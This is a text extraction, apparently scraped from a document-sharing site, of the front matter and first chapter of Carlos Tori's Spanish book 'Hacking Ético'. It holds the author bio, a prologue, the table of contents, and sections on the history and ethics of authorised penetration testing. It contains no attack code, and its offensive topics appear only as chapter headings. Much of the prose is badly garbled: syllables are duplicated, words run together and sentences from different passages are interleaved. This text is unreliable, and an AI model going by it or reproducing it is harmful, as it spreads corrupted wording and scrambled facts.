Hacking Etico - Carlos Tori

October 2, 2022 | Author: Anonymous | Category: N/A
Share Embed Donate


Short Description

Download Hacking Etico - Carlos Tori...

Description

 

 

 

 

 

 

 

HAÉCtK I N G ico

 

Carlos S. Tori Nació y creció en Rosario, Argentina. Es Analista de sistemas de información, Técnico superior en organización y métodos, y sistemas de computación. Actualmente cursa el último año de Ingeniería en Sistemas. Prestó servicios como consultor en seguridad a Hynet S.A , Argeniss/IOActive Inc., I-SEC Global Inc. llevando a cabo proyectos para sus clientes, de modo remoto e interno, tanto en organizaciones privadas como gubernamentales.  También se desempeñó como analista y administrador freelance freelance en varias empresas locales. Fue encargado de Seguridad Informática en  VoipGroup Inc. analizando servidores remotos, coordinando administradores y redactando políticas relacionadas a seguridad informática. Tuvo su primer contacto con la seguridad informática a mediados de los años 90 vía hyperterminal en las BBS, antes de conectarse a Internet. Su primer ordenador fue un Czerweny CZ 1500, regalado para el día del niño.

Contacto (Participacion en proyectos, feedback de lectores): [email protected] O a la casilla asociada a este PGP ID: 0x7F81D818

Dedicatoria:  A mi familia, a mi novia. no via.  Apoyo incondicional.

Agradecimientos a: Diego Coppari, Sebastian Grignoli, Cesar Cerrudo, Diego Krahenbuhl, Marcelo Soffredi, Marcelo Fernandez, Eduardo Cardone, Diego Maggio, Jonathan Sarba, Martín Vila, Christian Vila, Enrique Espejo Cabrera, Román Medina-Heigl

Hernández, Martín González Parra, Ulises Cuñé, profesores de la universidad UAI, Leonardo Pigñer, Iván Arce, Ariel Testa, Santiago Cavanna, Adolfo Fioranelli, Ricardo Goldberger, Juan Echeverría, Leandro Constantino, Pablo Tossi, Ismael Briasco, Alejandro Cordobés, staff del instituto ISEI, Juan Grimandella, Fabián Damici, Andrea, Ricardo Cedaro, Pablo Blanch, Nidia Singh, Carlos Contesti,  Vanina Muchnik, Carlos Robledo, Florencia Felgueroso, y Floreal Otegui.

 

Prólogo Siempre en las noticias escucharemos terribles cosas sobre so bre virus y ataques llevados a cabo por los hackers. Los medios sensacionalistas se han encargado en darle un mal significado a la palabra hacker hacker,, un significado que equipara a los hackers con criminales. Un hacker puede ser bueno o malo al igual que un abogado, un médico, un profesor o el oficio que fuera. El termino ethical hacking o hacking ético nace por tal motivo, era necesario aclarar que no es un hacking malo sino bueno, ético, pero en definitiva es hacking hacking.. Basándose en su experiencia y conocimiento del tema, Carlos nos brinda esta obra, que ayudará a adentrarlos en el mundo del hacking ético presentando los conceptos básicos más importantes en forma clara y eficiente, así como tambien, los orientará en como profundizar más sus conocimientos. Si estás interesado en aprender sobre seguridad informática y hacking ético, esta obra será entonces un excelente punto de partida en tu viaje a este apasionante mundo. Cesar Cerrudo. Fundador y CEO de Argeniss de  Argeniss..  www.argeniss.com

*El Sr. Cerrudo ha sido expositor en congresos de seguridad tales como: Microsoft,, Black Hat, Microsoft Hat, Bellua Bellua,, CanSecWest CanSecWest,, EuSecWest EuSecWest,,  Web  WebSec Sec,, HITBSecConf , entre otros. Ha descubierto vulnerabilidades críticas en Windows en Windows server 2008, 2008, Vista y otros productos de Microsoft Microsoft,, Oracle Oracle,, Yahoo, IBM y en un

sin fin de aplicaciones. Es el investigador en seguridad informática local con más proyección internacional que ha habido en estos ultimos años. Miembro de WASC de WASC (Web Application Security Consortium).

 

Contenido Capítulo 1

Hacking Ético Introducción (15) Formación del profesional (16) Organizaciones formales (37) Network security assessment (41) Un repaso por las características de las organizaciones, la historia del ethical hacking. las fuentes de estudio para la formación de un profesional y las nociones de un chequeo de seguridad mediante pautas legales.

Capítulo 3

Ingeniería Social Social (86) Intro a la Ingenieria IS +information gathering (93) Ejemplos (95) Medidas contra el engaño (104) En este capítulo se detallarán ejemplos de la técnica sobre el factor humano del sistema de información, relacionadas al engaño, fisico o a través de medios digitales. Capítulo 4

Recabar Información Intro a information gathering (46)

Introducción a Fuerza Bruta Empleos y orientación de la FB (108) Ejemplos didácticos (109) Factores que inciden en el tiempo (123) Rainbow Tables (128) Diccionario (130)

Consultas a bases de datos (48) Buscadores: google hacking (52) Otros recursos online (57) Cabeceras de mails (60) Escaneo de puertos y fingerprinting (63)

Sección dedicada a las características de la fuerza bruta como técnica de descubrir a la fuerza, un dato (como ser un password) o una manera de dar con una solu-

Capítulo 2

 Telneteo: busqueda a mano (70) Peticiones http (74) Datos dentro de archivos (76) Information gathering en vida real (78) Modulo de IG de Backtrack (79)  Analizando la información (82) Aquí se detallarán las maneras que tiene el profesional y su contraparte (el intruso) para recabar información previa al ataque para finalmente definir una estrategia de embate. Búsqueda pasiva, intrusiva, de la vida real, a mano o bien de modo automatizado via red o internet.

cion de una manera no muy elegante. Capítulo 5

 Aplicaciónes Web Directorios y archivos ocultos (135) Ingenieria inversa sobre flash (140)  XSS o cross site scripting (145) Cuentas de correo en 15 formas (154) Ejecución remota de comandos (154) Inclusión de archivos (154) Programación insegura = Exploits (156) Este capítulo hace referencia a instancias

4

 

dadas en pagínas Webs, aplicaciones o descuidos de administración existentes en ella y en determinados contextos. Se hace una leve referencia (mas bien ennumeración de 15 técnicas) a formas de comprometer casillas de correo electrónico como tambien, las medidas correctivas. Capítulo 6

Instalación de backdoors (217)  Troyanos (220) Borrado de rastros (222) Propagarse a la red interna (227) En este capítulo veremos técnicas usuales para comprometer servidores Windows, de modo automatizado y manual. Lo más interesante son las acciones del posible intruso dentro del servidor con cada uno de los puntos definidos en de-

Inyección de código SQL Introducción Introducció n (164) Ejemplo de Bypass de acceso (166) Historia de SQL Injection (171) Metodología (172) Evasión de reglas (175) Herramientas automatizadas (179) Caso real de hacking etico (183)

talle y ejemplos. Para conocer, se muestran algunos detalles realizados en su contraparte Linux.

casos de inyección de código SQL en aplicaciones, herramientas automatizadas

Dentro de la shell (238) Dsniff (246)

Capítulo 8

Servidores Linux Introducción (232) Nessus en Debian GNU/Linux (233) En este apartado, se ennumeran algunos  Acciones del intruso (236)

y un claro ejemplo paso a paso de como se logró el acceso a un panel de administración ejecutivo. Capítulo 7

Servidores Windows Servidores Introduccion Introduccio n (190) Comprometiendo un servidor (191) Comprometiendo Null Session sobre Netbios (196) Comandos NET (202) Herramientas recomendadas (205)  Acciones del intruso (212) Elevacion de privilegios (212) Busqueda de información (215)  Analisis (215) Captura de paquetes (216)

 Troyaniz  Troya nizar ar bin binar arios ios de sis siste tema ma (25 (251) 1) Instalando un backdoor/rootkit (256) Manipulando logs (259) Hardening a nivel kernel (266) Hardening de servicios (282) 5 Preguntas a un exploit writer (284) Como el titulo aclara, este capítulo será dedicado a lo referente en la plataforma Linux, un repaso breve por las acciones del intruso dentro de este, las herramientas y las técnicas más utilizadas. Tambien se describe paso a paso como como se asegura el servidor (hardening) tanto a nivel nucleo como de servicios y se recomiendan las mejores plataformas de trabajo para chequeo. Para finalizar, 5 preguntas a un desarrollador de exploits. 5

 

Capítulo 9

 Algunos Conceptos Conceptos Finales Hacking local o físico (290) Errores mas comunes cometidos (302)  Técnicas avanzadas (310) Metodologías y Normativas (312) En el último capítulo se aclaran algunos conceptos basados en experiencia del autor, acerca de los los errores mas comunes cometidos por los que se inician en la seguridad de modo formal, características de un hacking físico a un sistema, descripción de técnicas avanzadas que quedaron fuera del libro, y por último las normativas actuales sobre: chequeos, seguridad de la información, buenas

prácticas, optimización de sistemas en Gral.

Bonus Track

Como instalar una plataforma de trabajo/testeo multisistema paso GNU/Linux x a paso: FreeBSD, Debian GNU/Linu y Windows XP conviviendo conviviendo en el mismo disco. (317-328) Aquí se detalla paso a paso la instalación de tres sistemas operativos de manera muy clara, tambien se cuenta el porque conviene utilizarlos y en que tipo de trabajo nos beneficiará.

6

 

Introducción ¿Por dónde comienzo? Esa es, quizás, la pregunta más habitual que se hace todo aquel interesado en ingresar al universo heterogéneo que contempla la seguridad de los sistemas y sus activos. No es de extrañarse que esto sea así si tenemos en cuenta que hay demasiado material y que no hay una correcta plataforma o programa actual de educación formal sobre el tema. Como si eso fuera poco, esto sucede en un momento de la historia en el que existe un auge organizaciones altamente informatizadas en el que no haycomo dos iguales en el quedetodas son bastante desorganizadas. Éstas utilizan Internet recursoy  de comunicación para hacer movimientos constantes de información institucional pero apenas están tomando conciencia de la seguridad de la información y del alto  valor que tiene ésta hoy en día.

En las páginas de este libro intentaré ser lo más claro posible en los conceptos y en el desarrollo, a través de palabras y definiciones sencillas. No sólo para que sea llevadera e interesante la lectura sino también para que desde un principiante estudiante de sistemas o ejecutivo interesado, hasta el técnico sin demasiada experiencia, descubran y aprendan acerca de este tema desdela elexplicación principio yo en forma ordenada. Por eso, cuando sea conveniente extender el desarrollo de algún punto que no sea central, daré a conocer algún documento, recurso online o sitio web para su consulta. La temática está basada en la descripción detallada de las técnicas básicas y usuales de ethical hacking, más precisamente de un Network Security Assessment externo (comprobación de seguridad en red cuyo contenido no está alineado a ninguna certificación, metodología o curso de ese estilo). También habrá introducciones teóricas sobre aspectos del ethical hacking, notas relacionadas a la formación ideal de un profesional de la seguridad, gestión de organizaciones formales y la utilización de herramientas y metodologías, entre otras cosas. Además, se verán conceptos propios acerca de los escenarios personales o la importancia de generar errores en un chequeo, como también recomendaciones de muchos otros recursos serios en cuanto a material de estudio. En estas páginas que no se entrará en detalles sobre cómo explotar algunas  vulnerabilidades que existen hoy en día porque éstas probablemente serán solucionadas muy pronto, y de ese modo el libro o gran parte de él, se tornaría obsoleto. Esto se debe a que un grupo de profesionales tarda mucho menos en programar la solución o en redactar un excelente whitepaper (documento) sobre ello que lo que tarda la imprenta en imprimir esta edición. Como esto haría que leer este libro diera la misma sensación que leer un periódico viejo, es preferible 7

 

concentrarse en dónde ir a buscar esa información para obtenerla a diario y así  hacer que la teoría que aquí se expone sea útil en mayor porcentaje y por más tiempo. Esto será aplicable a la mayoría de los casos de ethical hacking o de seguridad informática (y de la información) con los que nos podamos encontrar y  nos permitirá estar informados de modo correcto a través de canales eficientes. El fin de este libro es comunicar conocimiento significativo sobre la materia, apuntando a aquellos que desean iniciarse o descubrir nuevos puntos de vista. Espero que lo disfrute.

Carlos Tori.

8

 

1hacking > El ético.

Refe Re fere renc ncia ias s hi hist stór óric icas as de su suce ceso sos s y de evol ev oluc ució ión n en la ma mate teri ria. a. Có Cómo mo se co come menz nzó ó a im impl plem emen enta tar r el ha hack ckin ing g ét étic ico, o, po por r quié qu iéne nes s y su sus s ca cara ract cter erís ísti tica cas; s; en dó dónd nde e y de qué modo actúan o se forman estos profesio prof esionale nales. s. Tamb También ién cono conocere ceremos mos mate ma teri rial al so sobr bre e as aspe pect ctos os im impo port rtan ante tes s de las la s or orga gani niza zaci cion ones es y la las s de defi fini nici cion ones es bási bá sica cas s de lo los s co comp mpon onen ente tes s in invo volu lucr crad ados os. .

 

UN POCO DE HISTORIA 

Si tu intención es describir la verdad, hazlo con sencillez y la elegancia déjasela al sastre.  Albert Einstein. Hace algún tiempo, cuando algunas de las organizaciones apenas comenzaban a incrementar los procesos informatizados dentro de su sistema de información, sus propios administradores y analistas técnicos eran los encargados de buscar claras falencias o brechas de seguridad en el escenario para solucionarlas como podían. En ese entonces, la mayoría no tenía una noción madura acerca de la seguridad de la información o de las intrusiones de terceros no autorizados en sus sistemas. A medida que pasó el tiempo, estas organizaciones se multiplicaron de manera notable y se informatizaron aún más, incluso tomando a Internet como plataforma de sus movimientos de información. De ese modo, se hicieron fluidas las  comunica, transacciones o flujo todo tipoa ciones  intersucursales digital y nivel interpersonales de importancia, ,dejando, al mismo tiempo, muchos más datos de expuestos terceros, como nunca antes había sucedido.

Hackers. Matthew

Broderick y su compañera de reparto en War Games (1983). El público en general conoce así a los hackers.

Como resultado de ello y debido a que grandes casos de intrusión se dieron a conocer al público en general a través de los medios de prensa (aunque muchos no 10

 

salen a la luz para salvaguardar una imagen institucional de organización confiable), se hizo evide evidente nte la falta de algún ser vicio profesional que imitara esos ataques o capacitara a su personal con las mismas metodologías que utilizaba el intruso. De esa manera, se podían evaluar las reales condiciones de seguridad en las que se encontraba una organización y, de existir agujeros en el sistema o potenciales brechas, descubrirlos y solucionarlos de forma preventiva. Los accesos no autorizados, junto a una gama de vulnerabilidades y todo tipo de amenazas relacionadas o dirigidas hacia Chacal.

 Actualmente, Mitnick es la estaban a la orden del empresario día.información, Desde algunos años antes, muchos relacionado Kevin a la seguridad deun la especialistas ligados a la seguridad infor- información y autor de dos interesantes libros. mática venían estudiando y practicando metodologías de intrusión en sus trabajos, laboratorios o casas. Así, comenzaron a brindarr a las organizaciones brinda organizaciones un servi servicio cio a modo de provee proveedores dores externos externos o contra contra-tados y, para darle un nombre medianamente formal, lo llamaron  ethical hacking . Este concepto incluye las denominaciones  vulnerability scanning   y  penetration   penetration test , mejor denominado denominado  network security assessment . Había una clara demanda de seguridad y, donde existe demanda, aparece una ofer-

ta. Por lo tanto, allí mismo nace un mercado. Apenas mediaban los años 90, ya asomaban las épocas de e-commerce, comenzaba la integración integración de las pequeñas y medianas empresas de todo el mundo a la red (e-organizaciones), a la que poco a poco se sumaba el público en general. Aparecía  malware  más sofisticado, se publicaban novedosas técnicas de intrusión o explotación de vulnerabilidades y no había demasiada demas iada conciencia sobre la admin administra istración ción segura de los serv servidores idores..  Al mismo tiempo, jóvenes de todo el mundo se colaban en Internet engañando las

 Malware

Con este nombre, se conoce todo aquello que se cataloga como código malicioso (programas). Generalmente, estas amenazas son detectadas por los antivirus, se trate de gusanos o worms, spyware, troyanos, virus o scripts malintencionados (en rutina de tiempo o de ejecución).

11

 

ce cent ntrral ales es tel elef efón óniica cass (p (por or un unaa cu cues esti tión ón de ga gast stos os)) de su suss pa país ísees pa parra di dive vert rtiirs rsee co con n loss si lo sist steema mass in info forrmá máti tico coss e in inte terrca camb mbia iarr co cono noci cimi mien ento toss co con n su suss pa parres de dell ot otrro la la-do del globo. De ese grupo de gente, saldría lo que en esos días serían algunos de loss me lo mejjor ores es pr prof ofes esio iona nalles de la se segu guri rida dad, d, así co como mo tam ambi biéén   hábil es int rusos. Este Es te fenó fenóme meno no pudo pudo ser posi posible ble gracias gracias a la ausen ausencia cia de una plata platafor forma ma educa educati ti va  va formal for mal sobre sobre el tema, tema, ya que los recur recursos sos de aprendi aprendiza zaje je eran, y a menu menudo do son (hoy  más que nunca), nunca), compar comparti tidos. dos. En aquel enton entonces, ces, sobre sobre segu seguri ridad dad no había había educa educa-ción formal formal más allá de un postgra post grado do en algu alguna na uni versi  versidad dad de EE.UU. o la que ofre of re-ciera cie ra una insti institu tución ción pri vada  vada para para sus emplea empleados. dos. En un ámbi ámbito to más infor informal, mal, recién recién en el año 1993, nació nació Bug conoci cida da lista lista de correo correo en la que se tratan tratan temas temas Bugtraq  traq , una cono de segu seguri ridad. dad. No fue todo todo de un día para para el otro, pero pero tu vo una marca marcada da evolu evolución. ción.

Securityfocus. La me jor defi defini nición ción de Bugtraq Bugtraq

(actualmen (actual mente te alo ja  jada da en www.se www.secu curity rityfo focus cus.com) .com) se encuen encuentra tra en Wiki Wikipe pedia, dia, ya que inclu incluye ye su histo historia ria comple completa. ta.

Ex  ploit Ex xploit, es un progra programa ma de prueba prueba de concep concepto to que puede puede estar estar en códi código go fuent fuente para compi com pilar lar (fuente.c) (fuente.c) o formato bina binario rio tipo tipo .exe. Sirve Sirve para para aprove aprovechar char o demos demostrar trar una

O

vulnera vulne rabi bili lidad dad en una aplica aplicación ción y puede puede estar escrita en varios varios lengua lengua jes de pro progra grama ma-ción. En secu security rityvulns vulns.co .com/ex m/exploits, ploits, encon encontra tramos mos un repo reposi sito torio rio de Proof of concept. concept.

12

 

A ÑO

SUCE CESO SO

1982

John Shoch (uno de los crea creado dores res de ether ethernet), net), junto junto a un cole colega, ga, escri escribie bieron ron el primer primer repor reporte te sobre sobre un gusa gusano no (worm), toman tomando do ese nombre nombre de una nove novela la de ciencia ciencia ficción ficción de 1975 en la que, ba jo el nom nombre bre Tape Tapeworms, worms, descri describían bían a progra pro gramas mas autó autóma matas tas que via ja  jaban ban por las red redes transpor portan tando do infor informa mación. ción.

1983

Ese año se es estre trenó nó la famo famosa sa pelí pelícu cula la War Games, Games, en la que el actor ac tor Matthew Matthew Brode Bro derick rick inter interpre preta taba ba a un chico chico que ingre ingresa saba ba en una base base mili militar tar a través través de su compu computa tado dora ra y casi casi desa desata ta una guerra guerra nuclear. nuclear.

1984

Se crea crearon ron la publi publica cación ción 2600, el CCC chaos compu computer ter club, Legion Legion of doom y la divi división sión de fraude fraude con tar je  jetas tas y compu computa tado doras ras del Servi Servicio cio Secre Secreto. to.

1988

Robert Ro bert Tappan Tappan Morris Morris soltó soltó un gusa gusano no en Arpa Arpanet net (como (como se llama llamaba ba Inter Internet net ante an tes) s) y de ese modo infec infectó tó miles miles de servi servido dores res Unix. Fue en jui  juicia ciado do y conde conde nado na do a cumplir cumplir 400 horas horas de traba traba jo social. so cial.

1992

Kevin Ke vin Mitnick, Mitnick, luego luego de estar estar prófu prófugo go y ser atrapa atrapado do por el FBI, fue senten sen tencia ciado do por robo robo de softwa software re e intru intrusio siones nes en orga organi niza zacio ciones. nes.

1994

Vladi Vla dimir mir Levin Levin robó, robó, desde desde San Peters Petersbur burgo, go, a través través de los siste sistemas mas de Citi Citi bank, más de 10 millo millones nes de dóla dólares res por medio medio de transfe transferen rencias cias a sus cuentas. cuentas. En los dos años siguien siguientes, tes, desde desde otros bancos bancos de los Esta Estados dos Unidos, Unidos, 300 mi llones llo nes de dóla dólares res se movi movili liza zaban ban electró electróni nica camen mente te de modo modo fraudu fraudulen lento. to. Sucesos.

Algu Al gunos nos hechos hechos impor importan tantes tes de la histo historia ria del hacking. hacking.

¿POR QUÉ ÉTICO? ÉTICO? Para emu Para emular lar la meto metodo dolo logía  gía  de ataque ataque de un intru intruso so infor informá máti tico co y no serlo, serlo, tiene tiene que haber haber éti ética  ca de por medio, medio, más allá de todas todas las condi condicio ciones, nes, térmi términos nos y acti acti vos  vos que haya haya alre alrede dedor dor del caso. caso. Imagi Imagine nemos mos que las auto autori rida dades des de un banco banco contra contratan tan a alguien alguien para para que simu simule le un robo robo (no a mano mano arma armada, da, claro claro está) está) y de ese modo modo se pruebe prue be la eficien eficiencia cia de su siste sistema ma de segu seguri ridad. dad. Este Este supues supuesto to ladrón ladrón profe profesio sional, nal, lueluego de lograr lograr su come cometi tido, do, infor informa ma a sus dueños dueños en deta detalle lle cómo cómo pudo pudo hacer hacerlo lo y cócó-

mo ellos debe deberían rían mejo mejorar rar su siste sistema ma de segu seguri ridad dad para para que no vol viera  viera a pasar. pasar. LóLógica gi camen mente, te, no se puede puede encar encargar gar de hacer hacer esto esto una perso persona na sin ética, ética, alguien alguien inmo inmo-ral. No entra entrare remos mos en el terre terreno no de lo ético ético como como rama rama dentro dentro de la filo filoso sofía fía práctica ti ca ni redac redacta tare remos mos un trata tratado do sobre sobre deonto deontolo logía gía profe profesio sional, nal, no sólo sólo por la cuescuestión de espa espacio, cio, sino sino también también por respe respeto to a los griegos. griegos. Sí, en cambio, cambio, dire diremos mos que la ética ética impli implica ca que el traba trabajo jo y la inter inter vención  vención del profe profesio sional nal en segu seguri ridad dad infor infor-máti má tica ca o de la infor informa mación ción no compro comprome meten ten de ningún ningún modo modo los acti acti vos  vos de la oror gani ga niza zación, ción, que son los valio valiosos sos datos datos con los que ella cuenta. cuenta. 13

 

Es Estos tos daños daños podrían podrían ser hechos hechos de varias varias mane maneras: ras: al modifi fican cando do a conconalte tera ración ción, modi ciencia cien cia regis registros tros o datos datos sensi sensibles; bles; bo destruyen yendo do infor informa mación, ción, bases bases de dadaborra rrado do, destru tos o sobres sobrescri cribien biendo do algún algún tipo tipo de dato; dato; dar a cono conocer cer infor informa mación ción a terce terceros ros, incum in cumplien pliendo do las normas normas de confi confiden dencia cialilidad; dad; sus robando do o guardan guardando do sustrac tracción ción, roban datos da tos en medios medios de alma almace cena namien miento to exter externos. nos. Todo Todo esto, esto, ya sea en la búsque búsqueda da de riesgos ries gos median mediante te un se comproba bación ción de segu seguri ridad, dad, como como también también secu curity rity assess assessment  ment o compro en la di vulga  vulgación ción de lo que se vio, habló, habló, escu escuchó chó o mani manipu puló ló en el transcur transcurso, so, en la plani pla nifi fica cación ción o en el desa desarro rrollo llo de la tarea tarea misma misma y en su análi análisis sis final. final. Más allá de la étiética propia propia de cada cada profe profesio sional, nal, existen existen conduc conductas tas míni mínimas mas que éste éste debe debe cumplir: cumplir: • Hacer su traba trabajo jo de la mejor mejor mane manera ra posi posible. ble. • Da Darr el el me mejor repor reporte. te. • Acordar un precio precio justo. justo. • Respe petar tar el secre secreto. to. • No hablar mal ni incul inculpar par a un admi adminis nistra trador dor o equipo equipo de progra programa mado dores. res. • No ac aceptar sobor sobornos. nos. • No mani nipu pular lar o alte alterar rar resul resulta tados dos o análi análisis. sis. • Dele legar gar tareas tareas espe especí cífi ficas cas en alguien alguien más capa capaci cita tado. do. • No pr prome meter ter algo algo impo imposi sible ble de cumplir. cumplir. • Se Serr res espon ponsa sable ble en su rol y función. fun ción. • Mane nejar jar los recur recursos sos de modo modo eficien eficiente. te. En nuestros nuestros tiempos, tiempos, para para la mayo mayoría ría de la gente gente y de la prensa, prensa, la pala palabra bra hacking  hacking  es está tácimien ligada liga datos a delin de testica comunes, comu nes,tróni a nica per perso delinquir. duquir. dudo dosa saPor morali mora dadti vo, uti co-conoci no mientos delincuen incuentes infor formá máti ca o electró elec casonas panas para ra delin de tallidad mo moti  que vo, utili en lizan elzan transtrans curso cur so de este este libro, libro, sólo sólo cita citare remos mos como como perso persona najes jes a dos figu figuras: ras: al pro profe fesio sional nal étiético y a su opuesto, opuesto, el in intru truso so, para para que no haya haya malen malenten tendi didos dos de ningún ningún tipo. tipo.

Inversa.

Portal sobre ingenieria inversa: video.reverse video.reverse-engineering.ne -engineering.nett

14  

Ejemplo Ejem plo de ethi ethical cal hacking hacking Para compren Para comprender der mejor mejor el concep concepto to de hacking hacking ético, ético, anali analice cemos mos un caso. caso. ¿Es étiético ingre ingresar sar en una casi casilla lla de correo correo electró electróni nico co ajena ajena sin cono conocer cer su pass word? BaBajo las posi posibi bililida dades des que brinda brinda el et supuesto. to. Esa situa situación ción puepueethi hical cal hacking  hacking , por supues de darse darse siempre siempre y cuando cuando la casi casilla lla de e-mail sea de alguien alguien que nos haya haya auto autori ri-zado, za do, como como profe profesio sional nal ético, ético, a demos demostrar trarle le que su orga organi niza zación ción es vulne vulnera rable. ble. CoComo una casi casilla lla es perso personal nal (quizás (quizás de un geren gerente te o de un admi adminis nistra trador dor de siste siste-mas), posi posible blemen mente te ese ingre ingreso so nos lle ve a obte obtener ner acce acceso so a deter determi mina nado do lugar lugar o a datos da tos sensi sensibles. bles. Éstos, Éstos, a su vez, serán serán utili utiliza zados dos para para lograr lograr entrar entrar en un ser vidor  vidor y  de allí diri dirigir girnos nos hacia hacia la red inter interna, na, con todo todo el riesgo riesgo que signi signififica ca para para una ororgani ga niza zación ción formal formal alta altamen mente te infor informa matitiza zada. da. De ese modo, modo, descu descubri brire remos mos peque peque-ños descui descuidos dos que, desde desde un lugar lugar impen impensa sado, do, pueden pueden expo exponer ner a la empre empresa sa por comple com pleto. to. Sin embar embargo, go, esta esta vez, ese riesgo riesgo pasa pasaría ría rápi rápido do a la histo historia, ria, ya que esestamos ta mos hablan hablando do de un típi típico co caso caso de et ethi hical cal hacking  hacking , en donde donde el proble problema ma es inintensa ten samen mente te busca buscado, do, descu descubier bierto, to, anali analiza zado, do, repor reporta tado do y por últi último mo solu solucio ciona nado do a la bre ve  vedad. dad. Para Pa ra lograr lograr algo algo así, se requie requieren ren dos elemen elementos tos bási básicos: cos: en princi principio, pio, me meto todo dolo logía  gía  para pa ra proce proceder. der. Esto Esto es el resul resulta tado do de un grupo grupo de piezas piezas pre via  viamen mente te ensam ensambla bla-das: habi habililida dades des perso persona nales les de lógi lógica ca y creati creati vidad,  vidad, técni técnicas cas propias propias de un net work   work  secu se curity rity assess assessment  ment , reco recono noci cimien miento to o rele rele va  vamien miento to de todos todos los compo componen nentes tes del esce es cena nario rio y herra herramien mientas tas como como un intér intérpre prete te de coman comandos dos del tipo tipo prompt o shell, un web browser browser y un editor editor de texto, texto, al menos menos para para este este caso. caso. Por otro lado, lado, se requie requiere re au auto tori riza zación ción, que es el elemen elemento to más impor importan tante. te. Esta Esta

autori auto riza zación ción también también tiene tiene sus partes: partes: un con contra trato to de confi confiden dencia ciali lidad  dad , coordi coordina na-ción, evalua evaluación, ción, proce procesos sos por seguir seguir y todas todas las carac caracte terís rístiticas cas inter internas nas (por ejemejemplo, el compro compromi miso so de la geren gerencia cia para para con el proyec proyecto to es vital) vital) o propias propias de las partes par tes in vo  volu lucra cradas das en este este traba trabajo jo/de /desa safío. fío. Para Pa ra resu resumir, mir, veamos veamos el proce proceso so de ethi ethical cal hacking hacking en pocas pocas pala palabras: bras: 1. La orga organi niza zación ción desea desea saber saber si sus siste sistemas mas son realmen realmente te segu seguros. ros. Lectura sobre ética

Es muy inte intere resan sante te el texto texto Ética Ética empre empresa sarial, rial, teoría teoría y casos, casos, del autor autor Rafael Rafael Gómez Gómez Pérez. Pé rez. Y para para cono conocer cer más sobre sobre el aspec aspecto to ético ético del hacking hacking liga ligado do a la segu seguri ridad dad de la infor informa mación, ción, es reco recomen menda dable ble el libro libro La ética ética del hacker hacker y el espí espíri ritu tu de la era de la infor informa mación, ción, del autor autor Pekka Pekka Hima Himanen, nen, con prólo prólogo go de Linus Linus Torvalds. Torvalds.

15

 

Selec leccio ciona na y contra contrata ta un ser vicio  vicio profe profesio sional nal de ethi ethical cal hacking. hacking. 2. Se 3. Lo auto autori riza za a reali realizar zar el traba trabajo jo median mediante te di versas  versas pautas. pautas. Plani nififican can estra estraté tégi gica camen mente te cómo cómo se reali realiza zará rá y el alcan alcance ce que tendrá. tendrá. 4. Pla profesio sional, nal, luego luego de lle var a ca cabo bo los análi análisis sis preli prelimi mina nares, res, reali realiza za su tarea tarea 5. El profe imitando imitan do al atacan atacante te real, pero pero sin compro comprome meter ter dato dato algu alguno. no. Luego, go, anali analiza za los resul resulta tados dos del secu security rity assess assessment. ment. 6. Lue Confec feccio ciona na un repor reporte te deta detalla llado do para para que la orga organi niza zación ción lo evalúe. evalúe. 7. Con Solu lucio ciona na lo vulne vulnera rable ble o miti mitiga ga lo poten potencial cial para para dejar dejar el siste sistema ma más segu seguro. ro. 8. So Se reafir reafirma ma la defen defensa sa del siste sistema ma en gene general. ral. adoptan polí polítiticas cas de control control y segui seguimien miento to (norma (normatiti va).  va). 9. Se adoptan Ethical Ethi cal hacking hacking es una meto metodo dolo lo gía utili uti liza zada da para para simu simular lar un ataataque mali malicio cioso so sin causar causar daño. daño. E-council E-coun cil – CEH v5.0

Formación del Profesional Knowledge is power. Sir Francis Bacon.

Una anécdo anécdota ta cono conoci cida da (que data data de la época época de las BBS, Bulle Bulletin tin Board System, System, allá por los años 90) descri describía bía cómo cómo dos jó ve  venes nes ingre ingresa saron ron en los siste sistemas mas de un labo labo-rato ra torio rio espa espacial. cial. Éstos Éstos lo logra lograron ron luego luego de haber haber inten intenta tado do muchas muchas contra contrase señas ñas enentre las cuales cuales había había nombres nombres de conste constela lacio ciones, nes, come cometas tas y plane planetas. tas. Final Finalmen mente, te, aceracertaron ta ron con un usuario usuario de siste sistema ma que tenía, tenía, como como cla ve, el nombre nombre de una leja lejana na esestrella. tre lla. El profe profesio sional nal de segu seguri ridad, dad, al lle var a ca cabo bo un net work  work secu security rity assess assessment ment como co mo parte parte de su traba trabajo jo de ethi ethical cal hacking, hacking, nece necesi sita ta contar contar con ese tipo tipo de lógi lógica ca y tiene tiene que aplicar aplicarla, la, más allá de utili utilizar zar las técni técnicas cas y herra herramien mientas tas (open source, source, cocomercia mer ciales les o pri vadas),  vadas), dado dado que nece necesi sita ta imitar imitar un ataque ataque de la mejor mejor mane manera ra y con el máxi máximo mo ni vel  vel posi posible. ble. Para Para eso, tendrá tendrá que emplear emplear todos todos los recur recursos sos de inte li-tenga a su alcan alcance, ce, utili utilizar zar al extre extremo mo sus co poder in deteli gencia  gen cia que tenga cono noci cimien mientos tos, poder dede median diante te el ra determi minar nar qué es lo mejor mejor que ducción duc ción y aná análi lisis sis me razo zona namien miento to y así deter puede pue de inten intentar, tar, cómo, cómo, dónde dónde y con qué. Por ejemplo, ejemplo, saber saber si un peque pequeño ño dato, dato, por más chico chico o insig insigni nififican cante te que parez parezca, ca, le será será útil y cómo cómo prose proseguir guir gracias gracias a él. Contitinua Con nuamen mente te debe deberá rá enfren enfrentar tarse se a etapas etapas que le deman demanden den la mayo mayoría ría de estas estas apaptititu tudes: des: • Saber cómo cómo defi definir nir patro patrones nes de conduc conducta ta y acción. acción. • Hacer rele rele va  vamien mientos tos pasi pasi vos  vos de in infor forma mación. ción. • Inter terpre pretar tar y gene generar rar códi código, go, cifra cifrado do y entro entropías pías de datos. datos. 16

 

• • • • •

